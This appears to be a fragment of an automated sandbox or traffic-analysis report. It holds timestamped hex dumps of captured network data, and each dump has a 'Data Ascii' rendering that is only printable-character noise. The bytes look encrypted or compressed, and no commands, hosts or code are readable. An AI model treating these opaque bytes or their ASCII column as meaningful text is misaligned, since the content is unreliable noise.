                                                          2022-02-07 11:02:46 UTC4INData Raw: 9c 98 15 eb aa 4f 69 8b de 7a 36 41 45 72 05 ba eb a9 fd ea 72 15 2d 91 37 01 0b fe 61 02 2d 21 87 0b e6 d7 3f ce 4b 8d 83 5d 9f 7c d9 e2 60 67 1c c1 27 ef f7 51 05 cf 60 d8 3c 1f 71 8e 9a 5e 54 04 8e 49 82 21 cf ca b7 8b d7 de 6b 03 43 22 05 3a 37 dd a8 56 2f 39 33 8c ea b0 40 96 e5 71 13 b9 67 fc a9 3f 09 c1 a2 3d a1 43 f7 60 54 8c d5 66 78 6c 18 4a 6b b5 cf fb 4c 38 ba 07 12 e7 c3 57 b6 e6 cc a6 2a 27 97 44 bc 07 3a ea 8e 9b 67 b7 d3 4b b5 17 b1 e0 e6 a6 1b e7 e3 67 cd e6 4e 43 95 97 2b 58 ec b3 79 2d d9 83 0d 2b 8e 2e 6d fd 9e fa 4c 65 70 b9 f6 be b6 1e 0c 0d 5d 1d a5 96 65 1f 41 8f ad 58 a5 8e 15 eb fd ba 06 b9 1d b3 e7 dd c5 8d 9e 4f a3 08 55 ed 81 02 ff 7c d6 0b e1 3c b7 42 0c 15 40 c8 d5 bf b6 10 9d 6b fa 9f 4b 4a e5 18 a3 54 bd 43 7f 60 d9 09 12
                                                          Data Ascii: Oiz6AErr-7a-!?K]|`g'Q`<q^TI!kC":7V/93@qg?=C`TfxlJkL8W*'D:gKgNC+Xy-+.mLep]eAXOU|<B@kKJTC`
                                                          2022-02-07 11:02:46 UTC5INData Raw: 95 03 4c cf 5d 59 e2 13 7a 2f c8 7e fb 98 f6 d5 0a 34 b5 d3 b0 d0 7b 7a 30 c1 47 52 37 65 e1 da 13 ac 9d 7c 29 3f 7e 6e 34 f9 26 29 09 ca 64 e1 1a 8d 31 4e dd a5 f7 72 ce ed e8 06 5d 54 a0 2f 6f 94 63 9f 9e d5 bd 1b 96 0b 1c 11 5b 18 50 7f 34 94 67 25 d3 aa ac 34 45 72 ec 6e 2e a6 f7 c1 8e af 7f 47 dd bb 9a 62 9b d6 4c 02 1a da d9 f4 b4 f2 71 09 de eb a8 12 dc 54 74 dc 74 79 c7 f8 ef d6 9e 49 ba 6f 70 9d b4 8c 76 8d ad 45 95 2c 87 75 76 fe 33 65 5e bd 57 3b 98 94 57 82 9f 6c 0d e0 53 f2 96 47 78 77 d5 75 8f 0a b8 a9 3e 75 9d dd 30 b1 28 64 b5 5c 9d 2b e9 0b b5 17 a5 d6 9f 99 6d 10 ab 5a 1c f1 45 e1 1b b0 8e 8a 6d 34 c3 45 64 d3 47 02 16 a1 e4 8a 3e af 92 95 92 f0 d0 df 6c e5 d9 c2 67 e6 bf 65 39 cd 0f ce 35 3a fa 0d 04 4a 49 28 da 0c d7 0b 57 58 bf 45 28
                                                          Data Ascii: L]Yz/~4{z0GR7e|)?~n4&)d1Nr]T/oc[P4g%4Ern.GbLqTttyIopvE,uv3e^W;WlSGxwu>u0(d\+mZEm4EdG>lge95:JI(WXE(
                                                          2022-02-07 11:02:46 UTC6INData Raw: d2 03 d9 8b 8c af ac c1 57 e4 4f 77 0f e5 49 36 2d 61 ff e6 b1 74 7e 44 62 80 cf fa de cb a1 6c 59 c1 02 d3 c2 90 db cc 5b 2c 04 7e d8 4e 9e 94 d7 39 fd a6 59 bb 66 25 76 f5 d4 7f 16 d7 82 1f e6 83 fb 90 46 de de c7 e0 ec a2 f4 f8 a4 9b c3 15 8e d0 33 48 eb ca 7c 57 f0 3f 55 37 87 82 c2 30 5c cb dd 7e d2 b7 6f 7e d3 4d 3e 88 0a 71 74 0b 5e bb 4c bd 8d 62 a3 11 38 3c fe 64 60 7d e0 56 ab cc 61 5a bf a5 e4 79 ed 04 1b 18 2c ac b6 66 5d 17 96 bb 8e 99 b9 bb b6 69 94 73 a5 9b 22 5a 82 1e 2b 62 41 75 5d 99 c2 de 4c d4 12 3b 30 7c a7 ca 1d 0d 4b 65 7a 72 f8 22 e3 b9 9c 45 f7 cd b7 1b b1 ff 4f f4 e2 1e cb a2 1e a9 fe 33 b7 56 5a 4a 4d 15 fd 38 76 a3 8d 4b e9 09 a7 77 79 0b 44 c4 f8 61 23 da 06 b8 ae 24 90 68 fa 8b d1 78 fe 46 80 bc e2 86 2a e5 20 00 fa d7 fb 80
                                                          Data Ascii: WOwI6-at~DblY[,~N9Yf%vF3H|W?U70\~o~M>qt^Lb8<d`}VaZy,f]is"Z+bAu]L;0|Kezr"EO3VZJM8vKwyDa#$hxF*
                                                          2022-02-07 11:02:46 UTC8INData Raw: fe a4 42 36 12 4d 22 ea 7f 75 44 dd f9 85 02 8b b9 56 4e 1a 70 6f 85 32 9e ea 59 21 b8 84 a2 70 68 8a e6 2b 95 51 c0 8d 3d 1d ad 2c 45 a6 73 32 53 64 21 79 f2 da b7 2b 25 a8 4e de 7c e6 c3 53 f1 30 3e 7e 78 40 58 2f c4 f2 be f0 e0 ab cf 67 ed 28 d8 6b 21 75 a0 d4 2f eb 6a 01 a0 95 de d8 18 32 65 5d c9 34 5c 6c 86 cf b3 3b 9e e5 8b ad 83 b7 02 7f b9 48 83 9a 86 0d ec 86 d5 f4 02 dd 31 2b 51 51 11 38 b1 ab d8 48 83 e9 65 d4 80 7f 12 44 7a 3d 5e 74 34 92 1f 70 33 3b 4b 54 81 d9 d5 16 df b6 a1 69 96 5f 1d 50 80 c1 c2 5a 3b 75 6b 2b 04 d5 54 3d 95 6d 63 e3 f3 4a c8 d3 58 11 84 23 e5 5b 9c 06 09 c7 3d eb f3 09 bf 79 10 e5 f9 22 34 b2 a0 d4 d8 05 40 50 cb a2 46 76 bd 88 f5 0b bd f5 d5 d8 dd 10 ea f4 ef d9 1e 66 60 ef b2 1c 39 6c 95 ba 54 9b 47 b7 7c b1 40 b9 3c
                                                          Data Ascii: B6M"uDVNpo2Y!ph+Q=,Es2Sd!y+%N|S0>~x@X/g(k!u/j2e]4\l;H1+QQ8HeDz=^t4p3;KTi_PZ;uk+T=mcJX#[=y"4@PFvf`9lTG|@<
                                                          2022-02-07 11:02:46 UTC9INData Raw: 2d d7 0a 12 f9 2a 2c 50 8a 72 92 b5 b7 73 62 70 e2 eb 53 6f 30 47 9c d1 42 ec 36 d8 dd 20 eb 09 2c 58 95 ee da a6 b0 6d fe fd a1 31 3a a8 52 ca 86 61 dd 8a c5 6a 6d 8c 77 0f 51 ae 77 83 12 92 ac 76 40 04 d3 9e 0e 20 30 ab c9 09 c4 df ce 8d c8 2c 7f d3 3b a3 53 97 ac 76 26 5f a5 f0 c9 35 8b 75 23 fa 7a 5e 48 c5 b4 a5 35 1e 93 f6 30 2d 25 f0 37 7d 37 83 7c b8 16 c4 8e 21 26 2c 08 a0 c3 0a ff 4b 1d cf 55 40 20 02 96 6f ef ad 71 40 91 3e 67 fc 58 bc 06 de b2 52 de 29 71 59 65 a7 8c 19 c8 e4 6c a6 87 31 b4 ab 41 fd 20 d0 aa c9 89 6e ef 56 0d 58 5e 70 11 02 c9 df 5c 3a 2a f7 cd 33 8f 6b 33 10 60 25 b9 8a b2 dc 65 81 0b 9b ac d8 38 d4 7b 56 00 1b d3 c6 50 ec a1 53 8f 4a 2a 4f bf 33 0f 27 0c 7a 16 cf 8e 11 a7 89 6b c6 ea 5a 21 c7 45 a4 d3 b4 6a b1 98 9c 37 0b 67
                                                          Data Ascii: -*,PrsbpSo0GB6 ,Xm1:RajmwQwv@ 0,;Sv&_5u#z^H50-%7}7|!&,KU@ oq@>gXR)qYel1A nVX^p\:*3k3`%e8{VPSJ*O3'zkZ!Ej7g
                                                          2022-02-07 11:02:46 UTC10INData Raw: 7c 83 26 aa 73 9e 5d 7f 68 04 52 3d 76 f4 fb df 1b ae 66 b4 cb 73 17 f7 47 d9 20 26 34 9b 76 ca cb d9 ec 4d 23 56 40 c1 ed 7a d3 b8 1a 7e f2 82 22 e6 ba d2 e9 ab fb 43 d7 f2 2e 90 28 1e 60 a6 58 99 f5 a6 14 a8 6d 4f 7a 67 b4 97 74 c6 33 9a 38 49 3a a9 5f f5 17 c7 39 a9 c0 66 3d 35 7a 64 81 36 84 2b 78 d3 16 79 1c 47 58 e9 42 84 6f 72 9a 70 cb 64 00 76 57 16 cb b4 1b ab e1 c8 92 54 bd f3 48 af be ce ab 5f 57 21 c2 4c d9 3f 95 63 e3 25 1a 55 8c 1d f2 b1 fc e4 fa 16 d1 5c 9f 57 b8 bf f6 ea f2 46 cb 03 c2 f1 e8 72 c3 39 4e ff fb 1e 0f 0d ba f3 f2 37 be b9 dc c8 d4 32 8f f5 0f b2 6c f4 b4 c7 42 d3 4f 2c 68 58 18 bd d0 c0 31 23 9f 1e 10 61 3c 28 7b 1a d1 e7 85 21 6b 14 65 4a 07 56 3a c1 97 c2 65 99 8e be 95 91 da 29 d7 89 61 70 a3 0a cb 65 49 2d c8 ff 34 56 8a
                                                          Data Ascii: |&s]hR=vfsG &4vM#V@z~"C.(`XmOzgt38I:_9f=5zd6+xyGXBorpdvWTH_W!L?c%U\WFr9N72lBO,hX1#a<({!keJV:e)apeI-4V
                                                          2022-02-07 11:02:46 UTC12INData Raw: 03 80 12 ee 12 97 f4 8c 92 0a ed fc 8b 9d 12 3b a8 50 67 e7 cb 9c c1 d6 9c 32 14 53 37 a3 18 1a a2 a1 c8 2e bd 86 8f 75 ee 36 e0 2a 18 ef 44 50 29 ac ae ec 22 0a 82 35 f4 a4 d0 57 1d 72 13 ce 47 d2 9d 38 4d 01 94 93 07 a3 8a 9a 0a 0d b4 f3 34 9b 95 b3 78 fe 73 b8 fe 4f 1c f3 2e 52 64 c7 35 03 be 3d 2a ed ce a4 8f 5e da 51 c5 58 7e 52 91 ae a5 a0 70 e5 4b 66 94 bf 69 7c 4c de 84 82 ee 24 cd ea 90 f2 87 aa f4 31 fd 78 e1 d9 46 f8 6b 51 a6 bf 60 09 ff a1 d9 3f 28 7b 4e 14 45 41 e5 24 5d 39 94 b9 5b 71 c0 34 e5 12 8b 5d 67 58 e6 eb 7d b1 96 57 44 06 4d c4 d2 7c cc f1 78 e0 07 82 34 47 b6 1a 7b 5f 92 e5 14 20 52 39 ef b6 90 84 33 64 fc f8 ef 3e b0 e8 7d 62 46 7a c7 23 25 6a 09 d9 0a b6 d6 8a 0d 76 ee e9 f7 5d 9f 3c 48 5e 25 1c 2e 0b cb 80 00 28 8f 74 01 e9 ff
                                                          Data Ascii: ;Pg2S7.u6*DP)"5WrG8M4xsO.Rd5=*^QX~RpKfi|L$1xFkQ`?({NEA$]9[q4]gX}WDM|x4G{_ R93d>}bFz#%jv]<H^%.(t
                                                          2022-02-07 11:02:46 UTC13INData Raw: cc 88 ad 02 fe 37 12 b1 16 9d b8 8a cf 86 95 9e fb 19 ca 66 b0 7a 8b 6d d6 7b 45 b6 1b 1e a3 e7 c8 43 c9 50 77 99 a5 d9 fd b8 18 2d 3e b5 c6 9f 99 0b 08 93 d2 67 98 e0 fe 4d 54 9f ce 19 3e a2 f4 75 b6 3b 24 52 59 19 ff 4b aa 83 31 e1 f8 7e d2 c1 f0 07 00 88 69 aa b5 23 8c e7 ca b1 70 18 0e fd c2 fe 52 93 11 ee 34 dd 50 3f b4 13 55 b2 56 36 36 40 e6 62 71 9a e1 97 e1 63 2d 62 a2 2a 52 b7 fa 2e 84 ef 37 9f 2c d9 01 c2 2b 19 87 cf 6b 60 07 7e fa 0c 45 f5 3c cb 44 d7 61 fe 15 ea 9f 0a b8 79 a0 85 cb 39 90 d9 ac e5 89 87 6e 78 41 5f 2f c2 98 76 7c 7a e6 93 d1 60 d3 0b 82 07 f9 b8 23 a2 c7 d1 21 28 68 0c 77 a5 e7 fb cd 49 2e 64 22 36 19 46 d4 e3 7e 57 aa 4d f0 7f 1f e6 4b 47 3e 50 17 c3 05 88 4d cf 31 18 47 2f ea 17 7e 44 6c 76 63 2c ed 70 2a c4 a8 e8 bd ce 87
                                                          Data Ascii: 7fzm{ECPw->gMT>u;$RYK1~i#pR4P?UV66@bqc-b*R.7,+k`~E<Day9nxA_/v|z`#!(hwI.d"6F~WMKG>PM1G/~Dlvc,p*
                                                          2022-02-07 11:02:46 UTC14INData Raw: 8a f2 18 fb 19 e1 6a 13 b1 e0 ee fc e3 d3 75 93 b1 43 b9 6a 82 0a 53 19 6f db 30 f7 33 4c 82 56 f3 dc a6 e7 98 26 36 86 6f 63 92 5e a3 43 f7 70 a7 06 7f e2 47 35 aa 90 6f 93 c7 1b a3 75 db d9 4f 11 71 6f ab 23 24 70 3b a1 ff 47 6f 5a c7 30 70 f6 8a 3c 99 ba bf 59 ba 2c e7 5c 25 a5 b9 3e 23 16 5c 39 c1 21 7f bb 46 8b 26 36 ce 68 4b 5d 3e bd 8e 44 63 ad 9d 09 ee 7f 8c 9b 14 2e a2 73 d3 2c 28 e9 c0 0f e3 38 04 70 ef 1b 91 8f 8d 35 d2 27 21 da c5 23 ad a7 0e de 79 11 6c d7 0b 45 02 c8 99 ef 11 d5 74 5f 27 a5 82 07 dc 55 8c 6b 57 c4 75 e2 65 99 81 63 26 f5 0b 2b ef 2c f9 78 b6 6b fd 58 f8 b9 ea 22 8d 14 ab d0 29 89 f1 bd 41 a5 5e ad bd 3f e7 5d 12 e8 28 60 75 5e d0 07 ff f7 20 42 01 e3 e2 84 18 07 82 6a 18 83 32 3e 56 27 86 2d b4 a0 b2 b0 ac 09 82 df 56 4b 51
                                                          Data Ascii: juCjSo03LV&6oc^CpG5ouOqo#$p;GoZ0p<Y,\%>#\9!F&6hK]>Dc.s,(8p5'!#ylEt_'UkWuec&+,xkX")A^?](`u^ Bj2>V'-VKQ
                                                          2022-02-07 11:02:46 UTC16INData Raw: 56 08 20 c0 75 35 92 c1 3e c7 e7 ef 36 ed f6 b7 6b ee a1 3a 2e bf 39 54 5a 6e 7c 72 ff 42 9c ec 69 17 48 47 9c fa a4 44 64 bb f4 66 c3 cf ca d2 e2 f0 a2 0a 22 ac 8a 69 cb a3 cf 71 56 63 f3 98 6d ef 97 c6 32 1b 40 f8 2b f4 de 1c 36 ed 85 be fb d4 26 39 cc e5 12 7c 56 19 1e 95 42 8f 07 00 69 cd a2 99 25 23 78 22 7b bf 49 2b 7a 18 d3 15 89 f4 1d c1 db 5e a4 b5 b9 3f 7a 33 a4 bf ab a6 d7 bf ba a6 d0 22 92 2c f7 a8 a8 b7 94 9d a7 e3 76 8d 9e 2b cd d6 90 5c 85 bb 46 0d f1 8e ee ef 09 ac c1 8a ba ae bf 52 2a 55 97 6f 11 fb 7b c1 99 ca bb b2 2f 0a bd 68 04 89 bd 84 c1 61 59 c6 d6 c9 af 0d c5 b8 46 3f 6e c3 c0 29 44 c7 2f bd 9d 4d d3 8e 0c 38 9c 9c d3 0e 83 bc 77 e1 da b9 b7 13 55 91 ba 19 64 9f 16 ec ac c0 40 d0 01 d4 cc 74 73 aa 46 f7 9b ba f8 f7 d6 b0 2d 71 87
                                                          Data Ascii: V u5>6k:.9TZn|rBiHGDdf"iqVcm2@+6&9|VBi%#x"{I+z^?z3",v+\FR*Uo{/haYF?n)D/M8wUd@tsF-q
                                                          2022-02-07 11:02:46 UTC17INData Raw: 28 ca 02 4d 63 e7 98 4c 51 f4 9b 2e f0 d8 11 86 8d 58 34 7d 5f e4 9b 8b 5e de b1 ff 22 80 91 c2 ca c0 4d 0f 24 5e a5 a5 54 14 eb c2 c9 26 74 05 7b 5b 9c e2 04 c4 20 c2 25 2d 0c ae 9b 3b 8e 3a e8 ac 5e 1b f9 07 d1 d1 37 a4 d9 98 e3 42 d1 21 a3 e6 9d 85 9d e6 4b bf e1 34 33 a6 86 67 d3 ff ae bf e5 80 b7 84 2d c6 ee e8 28 b8 c0 c2 e8 aa ad 55 34 15 75 ea 1a 01 ce 0a 45 8b f1 1d 83 8f bb f7 b2 17 dd 91 d1 cc b5 c6 61 2a fb a3 4c 0d 0f dc 41 01 65 37 00 66 b5 a3 21 c2 fb 6d 9e ed 2f 82 c5 44 b8 78 f1 34 77 86 30 a1 7a 6d fe 55 97 c8 02 76 47 d7 7f 2e 58 2c 12 a8 37 6a 3b ad c2 6c d2 a5 ad 2c 47 25 1a 55 5c 75 09 89 35 bd db f8 82 13 87 f5 66 6d 60 82 f3 cc ce 16 f8 11 6c 7a b7 59 b7 c1 9d d7 fd 01 0c 51 2f 7b a3 c9 e6 cc c5 ea d2 0a 9c 35 75 ac 13 8d b7 de a8
                                                          Data Ascii: (McLQ.X4}_^"M$^T&t{[ %-;:^7B!K43g-(U4uEa*LAe7f!m/Dx4w0zmUvG.X,7j;l,G%U\u5fm`lzYQ/{5u
                                                          2022-02-07 11:02:46 UTC18INData Raw: e1 0e a9 5a 82 c2 99 11 67 93 cd 19 f9 f8 31 2a 65 4a 4b ec 48 b7 e6 cd 25 40 74 4e 19 6c 26 a3 af 75 07 50 ca 92 60 9c 58 72 19 89 33 e9 97 9f 7c ba 7d 13 44 d9 59 e9 a5 a6 07 5d fd 27 37 28 0e a3 fc 47 5f 12 c4 ea 4b 54 3c 94 18 30 e2 2c 0c 4e d0 02 14 c7 fd 97 7c 15 c8 8d 43 67 b3 6f 02 2c 12 0f 97 9d cc d9 f4 8f bd fd 81 5d b3 bc 30 b9 fc dd d6 02 c4 8d 51 4b e3 53 d3 3b 65 db 2c c6 d3 1e 10 bf 17 78 01 a5 6a 6b f7 04 e7 7c cb 16 70 19 22 02 83 df 20 8a d2 92 b7 a6 5b 04 a8 6c b6 3e 1a 8c 18 5f b4 94 66 87 0c 03 fe 9c 8f ca 68 d3 88 2f 2f a1 02 5e 99 e3 5a ba 83 90 5a c1 f6 0c 59 b8 e2 17 6b 67 05 af d0 95 b0 9a 6d f6 c3 c1 5c 3a ed 2c 03 9b 12 9c 89 44 1d 95 eb 1a 70 66 12 9a 6c 12 68 bb 38 97 b1 86 49 26 11 4b eb d7 b6 06 5c 7a 9a c7 7e 12 90 5d df
                                                          Data Ascii: Zg1*eJKH%@tNl&uP`Xr3|}DY]'7(G_KT<0,N|Cgo,]0QKS;e,xjk|p" [l>_fh//^ZZYkgm\:,Dpflh8I&K\z~]
                                                          2022-02-07 11:02:46 UTC20INData Raw: 2a af 5c 22 b8 d0 98 94 6f b8 ff 70 ea b7 e3 18 14 17 44 a9 21 1f aa 85 82 99 30 c2 3f d7 e0 5d 12 b2 7b 72 0b d4 81 27 6b 36 12 7a b8 db 14 1e db c0 9f 93 c9 79 da 79 0c f0 0b 06 17 00 29 09 ee 28 8f cb 30 49 36 1b 3f 5a 9d fa e7 3c 00 e7 3d b7 1c 57 02 72 2d 7f 25 8c 5b 2c 51 07 f5 74 4a 8d 74 6f 16 7c b2 57 c9 ef e1 fd 3b 43 37 46 76 a3 7a 38 44 ae fb 84 3d 0c 07 19 25 b6 fa 03 83 37 8e 8b 9c 3d 16 9f 53 f0 2a b5 95 a2 dc 91 58 0d 4d fe bd 9a 3e a6 cf 11 af 0c f1 27 a4 45 d9 af 89 2f 82 d0 cd 71 42 0f 42 18 27 1c fe f3 f3 22 17 96 77 11 58 39 36 35 20 d6 b6 51 f1 34 29 87 2f af 63 8c 09 99 3a 49 00 60 90 25 c9 83 33 e7 cd f3 bf 18 fe bf 72 0e ad bb 90 a4 a5 c0 68 75 f9 fe df f0 30 4e d4 1f 17 b2 45 d4 ef 5f eb de f5 9b d9 e8 74 17 83 f6 56 77 32 ca 38
                                                          Data Ascii: *\"opD!0?]{r'k6zyy)(0I6?Z<=Wr-%[,QtJto|W;C7Fvz8D=%7=S*XM>'E/qBB'"wX965 Q4)/c:I`%3rhu0NE_tVw28
                                                          2022-02-07 11:02:46 UTC21INData Raw: a0 be 5a 9d 2c bf 88 7c 38 bd 3a ba 6f 7f 50 0b 72 68 7c 84 26 d0 ca 61 58 fd 63 75 0e 5f 9a 56 91 33 b8 49 cc 57 ac db 8e 6b 41 70 bd fb b3 bd 9f a8 6c 1b ea 64 75 2d e2 64 7e c2 98 bd 80 f4 7d 91 24 b2 b2 24 bc 97 dc b8 53 b7 64 4d be 1c 92 b9 d5 bb 0c 28 34 93 99 b3 cb 2d f0 c1 38 07 e1 d6 2c b2 2b 94 ec 24 5c a3 72 1c e2 aa 28 3b 8f 20 c3 45 c0 12 82 22 c5 70 e9 80 60 04 41 05 53 e4 51 66 d0 97 ac 61 cb 9c 56 99 7d 24 7c 1d f6 ee 78 c3 8e 81 bf 75 e2 1b 51 cd cc 63 01 cc 77 15 4f 8c 94 bb 19 7f b5 84 b3 52 43 7e 39 ce c0 82 e0 81 a7 f0 75 94 1d 87 a2 71 5c 21 ab 68 b4 df b7 4f c9 68 e3 3a 4d 2c 2f 40 d4 3f cf c4 9f 72 43 1e 89 81 26 f8 94 0d 18 39 06 76 df ff 07 21 aa e3 d9 68 9a 9e 4f 8d 83 63 a7 6d 98 85 51 7c 7c 1a 4d ad a7 e3 a0 41 a4 e4 f4 1e 68
                                                          Data Ascii: Z,|8:oPrh|&aXcu_V3IWkApldu-d~}$$SdM(4-8,+$\r(; E"p`ASQfaV}$|xuQcwORC~9uq\!hOh:M,/@?rC&9v!hOcmQ||MAh
                                                          2022-02-07 11:02:46 UTC22INData Raw: 3c aa 54 df ed b5 b7 e9 cf c0 34 4b 24 a6 99 03 56 51 93 8a cc 65 d0 87 56 64 ca ac 9e c1 5d 96 81 de ac f5 da 20 03 94 c7 4d 04 57 28 8e ce 8e ae 79 62 0c 28 74 0a 07 eb 59 31 4f a9 47 51 c4 29 45 da 3d bd fa bc d2 aa 35 38 27 24 a6 65 1b 30 2c b8 98 e3 f7 9d 72 5f 7b 65 ec b0 cf 06 9e 68 9a 21 11 46 fa c1 e1 fe 35 59 89 b2 86 d5 60 06 58 13 88 54 a4 7c 17 82 b0 c3 6a 99 2a 0d 90 ef 0e 86 e3 8c 61 6e c6 9c 27 73 87 df 7a 86 e6 47 b0 06 02 3c d4 c1 50 80 23 a3 61 eb 73 57 14 e7 d5 70 87 27 fe 71 a4 0d 48 17 8c 96 0c a0 85 f3 32 76 dd dd 13 e4 7d c3 5a 4a 6f e7 87 a1 fe a7 37 a8 e0 50 a3 5d a2 14 43 66 48 ea d2 0e f7 b6 f3 02 00 f1 3d 93 0c e1 42 f1 a5 27 76 bf d1 68 23 83 cb 95 d0 54 d1 0c 0e 19 02 02 6f 81 4c a7 1f b1 3f 64 d7 8f 82 89 2a 2a f7 d0 4d d0
                                                          Data Ascii: <T4K$VQeVd] MW(yb(tY1OGQ)E=58'$e0,r_{eh!F5Y`XT|j*an'szG<P#asWp'qH2v}ZJo7P]CfH=B'vh#ToL?d**M
                                                          2022-02-07 11:02:46 UTC24INData Raw: 8a 02 0f b0 41 f7 dc c0 91 a5 b9 a4 92 e3 f1 a7 dc a8 04 da 1b 5b 2e a8 55 7e 39 d1 98 ea ac aa 3e c7 41 d7 4b ba 2e cc 39 f2 13 fc 8b d4 28 9f 71 2b 4e 13 4a 2c ae b0 68 dc a9 25 12 06 a1 2a aa 90 12 bf 21 11 df 95 9e 02 b8 40 87 95 b6 5f bf d0 ed 8b c2 45 25 d8 f2 8a 55 cb 78 1e e4 9e 64 95 ea 1f ef 79 d0 1b 92 ef c5 68 e9 3a 19 79 ff b9 34 f2 17 85 92 7e 32 92 45 af c1 f7 41 7a 4b 7f 95 51 0a 6a 84 1f 1e d7 fc fa f8 4a 27 c5 66 55 2b 4f 80 bb 9c 61 21 c2 5f 3e 0c 40 f4 04 53 b8 6b c8 7e c4 b1 0e 6a 61 69 12 49 29 92 51 7f 45 67 ca d1 16 f5 e0 0f 3e c5 21 7f 68 0a 58 53 81 80 de a1 87 1d 39 3f cf ab 88 43 1b 45 6e 01 b1 85 ef f8 28 51 2f 04 83 e0 95 56 82 a8 d5 57 85 0b 15 5e ca 92 ee 54 78 53 5a 40 79 2d ca 3e a0 aa 49 0d cb f7 59 c8 d7 35 73 f3 d8 bf
                                                          Data Ascii: A[.U~9>AK.9(q+NJ,h%*!@_E%Uxdyh:y4~2EAzKQjJ'fU+Oa!_>@Sk~jaiI)QEg>!hXS9?CEn(Q/VW^TxSZ@y->IY5s
                                                          2022-02-07 11:02:46 UTC25INData Raw: f2 c8 eb 2c 4d 58 dc f2 37 45 87 eb 40 64 61 e7 f5 61 39 56 28 fe 87 fc 24 36 b2 73 e8 04 27 ad e8 60 df 87 80 7a cd e2 25 b3 93 af c5 93 05 40 19 93 5c db 59 d7 86 ef 70 4b 9a 88 0b 47 ae 51 6f 33 e6 b0 4b 0e fc 5c ed fb 43 2c 8c ab 52 7f 6b 3b dc f4 d8 9a 95 1a 3d 52 38 69 08 b2 73 4c bb 65 80 b8 9f 4b be 25 4b 7c 97 63 c9 0f 64 28 09 47 34 50 08 b1 03 b8 4e 79 d2 9e d6 c3 16 17 b1 f8 01 d6 ed 67 e8 ec 97 ca c0 e0 b5 a6 cd 92 47 4b 2f 96 28 1c 1a e5 60 48 e3 46 b3 1b 9f 1d 33 71 51 e6 aa 0c ba 6f 0f 36 33 a3 56 fa e8 c2 cb 33 4b 20 8d 27 21 c0 26 6b 03 92 e5 f6 63 fc 98 a2 41 59 8d 0d c7 f2 34 1e fe cf 4d 7e df 9a 4a cc ba 8c a3 7f 3a 68 87 48 3f e7 98 57 5b 6d 94 7a 21 c5 76 a6 79 39 54 8a a5 5b 0a 4f e3 75 fc f5 12 02 87 88 4e 4e a6 fb 4d 02 1c 61 bb
                                                          Data Ascii: ,MX7E@daa9V($6s'`z%@\YpKGQo3K\C,Rk;=R8isLeK%K|cd(G4PNygGK/(`HF3qQo63V3K '!&kcAY4M~J:hH?W[mz!vy9T[OuNNMa
                                                          2022-02-07 11:02:46 UTC26INData Raw: a1 94 7e d8 4d f5 fa fe 6c 56 60 de 6b fd d7 c9 02 51 1c b1 a8 51 2a d8 99 a9 63 6e 36 e7 52 10 6f 4a 61 4b ee 6e 36 c3 d7 3c f9 3e 61 63 93 20 16 0c 23 3c 26 03 2d 7e 66 40 a2 65 bf 64 09 1b f8 91 f6 ba 06 96 7f 8f 6f ac db c1 c1 65 d6 02 c6 a8 d0 04 48 0d 8a 2b 6b 13 02 1d 37 8d df 7c 40 46 2d 80 36 9a 3c 15 0a 38 a0 a4 1c 58 31 e7 7b 13 dc d3 02 53 8b 1f 2d 4d 65 07 6e ae 7f f2 49 df 6f 9d 31 a1 37 29 50 be 3c ab 33 21 23 dc 7a 34 f3 27 40 84 4f 5c 78 ba 80 ac 08 d7 fb 2d 18 fd b0 ea ac 5b 87 7c 75 9f 6a 0f 47 9d 49 0c d9 e6 96 87 dc 3a c8 26 d6 e1 96 26 87 59 ba 27 56 ba b1 ff 67 fc 31 eb c1 00 dd f0 2a 31 90 1d 58 a4 42 77 a6 83 b8 03 fd fd ba 0d 1d 03 e9 47 6f 74 4a 3f ce 9a 7f 72 a1 ac d4 07 f3 f9 b9 65 13 5e e8 4e c6 a4 93 41 cc ed 52 14 31 cb 4d
                                                          Data Ascii: ~MlV`kQQ*cn6RoJaKn6<>ac #<&-~f@edoeH+k7|@F-6<8X1{S-MenIo17)P<3!#z4'@O\x-[|ujGI:&&Y'Vg1*1XBwGotJ?re^NAR1M
                                                          2022-02-07 11:02:46 UTC28INData Raw: 68 13 3a 7d b7 08 2a 9a d0 fd f5 2e db 60 bf 93 67 0f ba a0 2b 8e 65 06 06 c6 58 f3 a4 95 c2 9c 3f b4 a7 e5 97 e4 a9 d4 82 41 71 b8 a6 aa 0f 06 9f 86 57 f6 b0 90 72 86 6e a0 1a fe 98 86 e9 71 b5 83 9b 44 b5 62 2a 28 1b 25 27 89 f2 99 2e 3a 81 02 41 44 29 02 52 55 8f d8 7d 5c 59 03 5d 18 6c b3 11 68 40 98 9f f1 34 a4 14 62 91 cf e0 99 d8 46 0a 9b 08 63 60 7c 7b 49 da 1d 54 ae 05 65 a0 7f 7f db 99 66 c1 ab 88 d3 b7 5d 78 13 5f 15 03 58 36 db a4 0a 3e e5 0c b6 77 aa 8d d5 3d f4 62 ca 81 96 ef 6e 7f f6 c1 cc 6a 5c c3 2c b7 49 d4 28 10 a6 20 81 d1 a6 c5 f8 27 3e ce 74 3e 70 62 80 72 7c 11 65 3a bf fa c8 ae b5 1e 6f 23 80 4c 6b 32 67 bd 8d 05 5e 76 03 34 92 05 a2 58 33 96 10 84 cf 3f 74 3e dd 20 e0 b5 1c 14 5b be cf 2d 3f c2 f7 e6 32 8f cc f6 4a 5b 15 d4 fa cc
                                                          Data Ascii: h:}*.`g+eX?AqWrnqDb*(%'.:AD)RU}\Y]lh@4bFc`|{ITef]x_X6>w=bnj\,I( '>t>pbr|e:o#Lk2g^v4X3?t> [-?2J[
                                                          2022-02-07 11:02:46 UTC29INData Raw: da 43 a5 d0 b0 14 e1 25 d6 b2 45 5f fc 05 5c 64 2f d6 fa 5d b7 4e 8f 43 1b 5a ed 3d 69 af 70 d0 ff a9 45 45 4e 9c ad 34 6a b0 04 26 65 d8 0f de 6b c4 88 91 65 25 23 2f f1 0e 9c d8 c9 55 13 30 dc 7f 29 3e 78 1d 22 7c a8 ab a1 fe 65 b3 48 02 d9 7a d0 5c 56 85 fa 4b 1b e2 28 2b ce 17 bb 1e 0c d9 97 5b 95 f1 62 05 71 71 c3 1a 14 3e 3e d6 76 98 a9 17 dc fd ab 9e 3f b1 5e 0c e3 31 f4 2a 64 16 04 be a6 bf e0 be 8d 8b c4 27 5d e0 07 d1 5e c0 3a 8a df ed 1c cd 3c fb 03 a6 3b 99 0c 58 ad eb 56 e0 58 9a 7a ae af 1f 51 ae 35 0d e2 5e e8 83 3d 23 a0 5f c2 57 cd 55 82 c3 6d 2d db c6 67 e2 3c de a2 e7 14 3c a8 ee 01 65 19 44 66 72 8a ea 15 40 c7 90 9a 3e d5 84 c7 a5 65 0d 68 38 52 12 df 3f 07 